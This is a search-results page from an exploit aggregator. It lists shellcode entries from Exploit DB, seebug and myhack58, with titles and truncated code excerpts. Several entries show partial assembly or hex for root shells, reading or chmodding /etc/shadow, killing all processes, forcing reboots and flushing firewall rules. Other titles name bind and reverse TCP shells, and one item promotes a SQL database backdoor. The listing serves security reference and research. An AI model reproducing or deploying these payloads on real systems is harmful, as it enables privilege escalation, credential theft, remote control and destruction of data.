Lucene search
+L

988 matches found

Exploit DB
Exploit DB
•added 2009/06/18 12:00 a.m.•27 views

netbsd/x86 kill all processes shellcode 23 bytes

netbsd/x86 kill all processes shellcode 23 bytes. Shellcode exploit for netbsdx86 platform / netbsd/x86 kill all processes shellcode author Anonymous this shellcode is using syscall number 37 or 0x25 37 STD int syskillint pid, int signum; here is assembler code using intel syntaxe and NASM...

0.2AI score
SaveExploits0
myhack58
myhack58
•added 2009/06/12 12:00 a.m.•169 views

Use SQLRootKit web database the back door control case-vulnerability warning-the black bar safety net

Through this case study you can learn to: ① Understand the web database the back door SQLRootKit and other aspects of knowledge; ② Use SQLRootKit 1.0 and SQLRootKit 3.0 database Backdoor to control the computer. SQLRootKit is a method used to execute the database command in the web script, the...

7.8AI score
SaveExploits0
seebug.org
seebug.org
•added 2009/05/15 12:00 a.m.•26 views

linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes

No description provided by source. / setuid0 + execve/bin/sh - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "push %rbx; \n\t" "movq %rsp,%rdi; \n\t" "xorq...

7.1AI score
SaveExploits0
seebug.org
seebug.org
•added 2009/03/02 12:00 a.m.•28 views

FreeBSD/x86 - kill all processes - 12 bytes

No description provided by source. CoDed bY suN8Hclf DaRk-CodeRs Group productions, kid FreeBSD x86 kill all procesess 12 bytes shellcode Compile: nasm -f elf code.asm ld -e start -o code code.o Assembly code: ---------------------code.asm------------------- section .text global start start: xor...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/02/27 12:00 a.m.•27 views

linux/x86 file reader 65 bytes + pathname

linux/x86 file reader 65 bytes + pathname. Shellcode exploit for linx86 platform / Linux/x86 file reader. 65 bytes + pathname Author: certaindeath Source code: start: xor %eax, %eax xor %ebx, %ebx xor %ecx, %ecx xor %edx, %edx jmp two one: pop %ebx movb $5, %al xor %ecx, %ecx int $0x80 mov %eax,...

0.1AI score
SaveExploits0
seebug.org
seebug.org
•added 2009/02/21 12:00 a.m.•29 views

Linux/x86 - cdrom ejecting

No description provided by source. / CDROM EJECTING CODE by lamagra .data .globl main .type main,@function start: setreuid 0, 0 xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx movb $70,%al int $0x80 jmp 0x21 popl %esi movb %edx,10%esi leal %esi, %ebx open"/dev/cdrom",...

7.1AI score
SaveExploits0
seebug.org
seebug.org
•added 2009/02/04 12:00 a.m.•37 views

win32/xp sp2 Shellcode cmd.exe 57 bytes

No description provided by source. / win32/xp sp2 cmd.exe 57 bytes Author : Mountassif Moad Big Thnx : Houssamix :d Assembly Code : Secret Changed by : Stack Description : It is 57 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 / include stdlib.h include string.h unsigned char...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•20 views

Windows/x86 (XP SP3) (Turkish) - MessageBoxA Shellcode (109 bytes)

Windows/x86 XP SP3 Turkish - MessageBoxA Shellcode 109 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF Title : win32/xp sp3 Tr MessageBoxA Shellcode 109 bytes Proof : http://img443.imageshack.us/img443/7900/proofaz.jpg Author : ZoRLu mail-msn :...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•27 views

Linux/x86 - setuid(0) + chmod(/etc/shadow, 0666) Shellcode (37 bytes)

Linux/x86 - setuid0 + chmod/etc/shadow, 0666 Shellcode 37 bytes. Shellcode exploit for Linuxx86 platform / Title: linux/x86 setuid0 + chmod"/etc/shadow", 0666 Shellcode 37 Bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 db xor %ebx,%ebx b0 17 mov $0x17,%al cd 80 int...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•41 views

Windows/x86 (XP SP3) (Turkish) - cmd.exe Shellcode (52 bytes)

Windows/x86 XP SP3 Turkish - cmd.exe Shellcode 52 bytes. Shellcode exploit for Windowsx86 platform. Tags: Metasploit Framework MSF Title : win32/xp sp3 Tr cmd.exe Shellcode 52 bytes Proof : http://img59.imageshack.us/img59/6499/proofc.png Author : ZoRLu / http://inj3ct0r.com/author/577 mail-msn :...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•30 views

Windows/x86 (NT/XP/2000/2003) - Bind TCP (8721/TCP) Shell Shellcode (356 bytes)

Windows/x86 NT/XP/2000/2003 - Bind TCP 8721/TCP Shell Shellcode 356 bytes. Shellcode exploit for Windowsx86 platform ; Title: Win32 Bind Shell ; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003 ; Function: Listen for connection and spawn command shell ; Author: hdmatmetasploit.co...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•28 views

FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)

FreeBSD/x86-64 - execve/bin/sh Shellcode 28 bytes. Shellcode exploit for FreeBSDx86-64 platform / Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05";...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•33 views

FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)

FreeBSD/x86 - /sbin/pfctl -F all Shellcode 47 bytes. Shellcode exploit for FreeBSDx86 platform / Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes' Type: Shellcode Author: antrhacks Platform: FreeBSD 8.0-RELEASE / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2d 46 61 6c pus...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•34 views

Linux/x86 - Force Reboot Shellcode (36 bytes)

Linux/x86 - Force Reboot Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform Linux/x86 Force Reboot shellcode 36 bytes Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom xor %eax,%eax push %eax push $0x746f6f62 push $0x65722f6e...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•41 views

FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

FreeBSD/x86 - execv/bin/sh Shellcode 23 bytes. Shellcode exploit for FreeBSDx86 platform / -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include include char shellcode =...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•61 views

Linux/x86 - execve(/bin/cat, /etc/shadow, NULL) Shellcode (42 bytes)

Linux/x86 - execve/bin/cat, /etc/shadow, NULL Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform / Title: linux/x86 execve/bin/cat, /etc/shadow, NULL - 42 bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2f 63 61 74 push...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•27 views

Linux/x86 - setresuid(0,0,0) + execve(/bin/sh) + exit() Shellcode (41 bytes)

Linux/x86 - setresuid0,0,0 + execve/bin/sh + exit Shellcode 41 bytes. Shellcode exploit for Linuxx86 platform / linux x86 shellcode41 bytes by sacrine of Netric www.netric.org setresuid0,0,0; execve /bin/sh; exit; asm" xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx cdq movb $0xa4, %al int $0x80 xor...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•28 views

Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Linux/x86 - Reverse TCP www.netric.org:45295/TCP Shell /bin/sh Shellcode 131 bytes. Shellcode exploit for Linuxx86 platform / linux x86 shellcode by eSDee of Netric www.netric.org 131 byte - connect back shellcode port=0xb0ef / include char shellcode = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2009/01/01 12:00 a.m.•36 views

Alpha - /bin/sh Shellcode (80 bytes)

Alpha - /bin/sh Shellcode 80 bytes. Shellcode exploit for Alpha platform / Lamont Granquist [email protected] [email protected] / int rawcode = 0x2230fec4, / subq $16,0x13c,$17 2000/ 0x47ff0412, / clr $18 2000/ 0x42509532, / subq $18, 0x84 2000/ 0x239fffff, / xor $18, 0xffffffff,...

7.1AI score
SaveExploits0
myhack58
myhack58
•added 2008/12/11 12:00 a.m.•25 views

IE7 0day shellcode analysis(2)-bug warning-the black bar safety net

The corresponding Assembly code is as follows 0A0FF9FB 5 8 pop eax 0A0FF9FC 5 8 pop eax 0A0FF9FD 33DB xor ebx, ebx 0A0FF9FF B3 1C mov bl, 1C 0A0FFA01 03C3 add eax, ebx 0A0FFA03 31C9 xor ecx, ecx 0A0FFA05 6 6:81E9 65FA sub cx, 0FA65 0A0FFA0A 8 0 3 0 2 1 xor byte ptr eax, 2 1 0A0FFA0D 4 0 inc eax...

7.4AI score
SaveExploits0
Rows per page
Query Builder